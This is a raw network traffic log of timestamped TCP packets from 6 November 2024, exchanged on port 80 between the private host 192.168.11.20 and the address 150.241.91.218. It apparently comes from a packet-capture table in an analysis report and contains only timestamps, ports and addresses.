                                                                                                                                                              Nov 6, 2024 17:34:04.187423944 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.187824011 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.193249941 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.193377972 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.193856001 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.199424028 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.199434042 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.199628115 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.205635071 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.205645084 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.205800056 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.211066961 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.211076975 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.211270094 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.217036009 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.217046022 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.217303991 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.222764015 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.222841978 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.223015070 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.228790045 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.228800058 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.229895115 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.234299898 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.234311104 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.234492064 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.239392042 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.239402056 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.239675045 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.244991064 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.245002985 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.245234013 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.250201941 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.250216007 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.250510931 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.255808115 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.255824089 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.255987883 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.261007071 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.261023998 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.261250973 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.266297102 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.266310930 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.266546965 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.270397902 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.270412922 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.270716906 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.274352074 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.274367094 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.274614096 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.278260946 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.278276920 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.278485060 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.282068014 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.282080889 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.282419920 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.286056042 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.286072969 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.286402941 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.289825916 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.289841890 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.290179968 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.293499947 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.293515921 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.293852091 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.296998024 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.297013044 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.297287941 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.300407887 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.300429106 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.300714016 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.304016113 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.304028988 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.304255962 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.307367086 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.307379961 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.307617903 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.311147928 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.311163902 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.311445951 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.314275026 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.314291000 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.314537048 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.317650080 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.317667007 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.317981005 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.320898056 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.320914030 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.321228981 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.324105024 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.324120998 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.324363947 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.327212095 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.327225924 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.327397108 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.330100060 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.330208063 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.330394983 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.333117008 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.333213091 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.333415031 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.336199045 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.336318016 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.336534023 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.339346886 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.339364052 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.339598894 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.342340946 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.342354059 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.342614889 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.345396996 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.345413923 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.345733881 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.348131895 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.348145008 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.348387957 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.351340055 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.351356030 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.351600885 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.354120970 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.354136944 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.354382992 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.357042074 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.357059002 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.357235909 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.359806061 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.359822989 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.360006094 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.362695932 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.362713099 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.362962961 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.365390062 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.365513086 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.365680933 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.368127108 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.368139982 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.368386030 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.371077061 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.371088982 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.371332884 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.373840094 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.373856068 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.374102116 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.376430988 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.376444101 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.376710892 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.379093885 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.379110098 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.379426956 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.381488085 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.381504059 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.381822109 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.384217024 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.384232998 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.384552002 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.386543989 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.386569977 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.386898041 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.389612913 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.389630079 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.389955997 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.392051935 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.392067909 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.392316103 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.394582987 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.394598961 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.394824028 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.396948099 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.396962881 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.397290945 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.399636030 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.399652004 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.399897099 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.402204037 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.402220011 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.402540922 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.417155981 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.417172909 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.417373896 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.418508053 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.446335077 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.446348906 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.446670055 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.447927952 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.448229074 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.448303938 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.448343039 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.448558092 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.450737000 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.450748920 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.451018095 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.475995064 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.476475000 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.476752043 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.476854086 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.505662918 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.505680084 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.506016970 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.506581068 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.506597042 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.506922960 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.508259058 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.508274078 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.508611917 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.510188103 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.510205030 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.510540009 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.511931896 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.511949062 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.512284040 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.535274982 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.535398006 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.535612106 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.536123037 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.536137104 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.536382914 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.564799070 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.564815998 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.565150976 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.565315008 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.590343952 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.590625048 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.593857050 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.593946934 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.594170094 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.594429016 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.595016956 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.595030069 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.595292091 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.596380949 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.596591949 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.623047113 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.623055935 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.623291969 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.623666048 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.623677015 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.623917103 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.624953032 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.624962091 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.625298977 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.626202106 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.652821064 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.652829885 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.653029919 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.653393984 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.653403044 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.653671980 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.681849003 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.681945086 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.682171106 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.682414055 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.682965994 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.683089018 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.683131933 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.684237003 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.684488058 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.684958935 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.684967995 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.685226917 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.686212063 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.686220884 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.686580896 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.711246014 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.711400986 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.711561918 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.711875916 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.712491035 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.712578058 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.712672949 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.713644028 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.713746071 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.713917017 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.763554096 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.770615101 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.770703077 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.770905972 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.771359921 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.771373034 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.771650076 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.772538900 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.772552013 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.772923946 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.773670912 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.773772001 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.774034977 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.774903059 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.775007963 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.775289059 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.778496027 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.799777985 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.799791098 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.800123930 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.800399065 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.800412893 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.800604105 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.801367044 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.801651955 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:06.684490919 CET4975680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:06.872720003 CET8049756150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:06.873317957 CET4975680192.168.11.20150.241.91.218
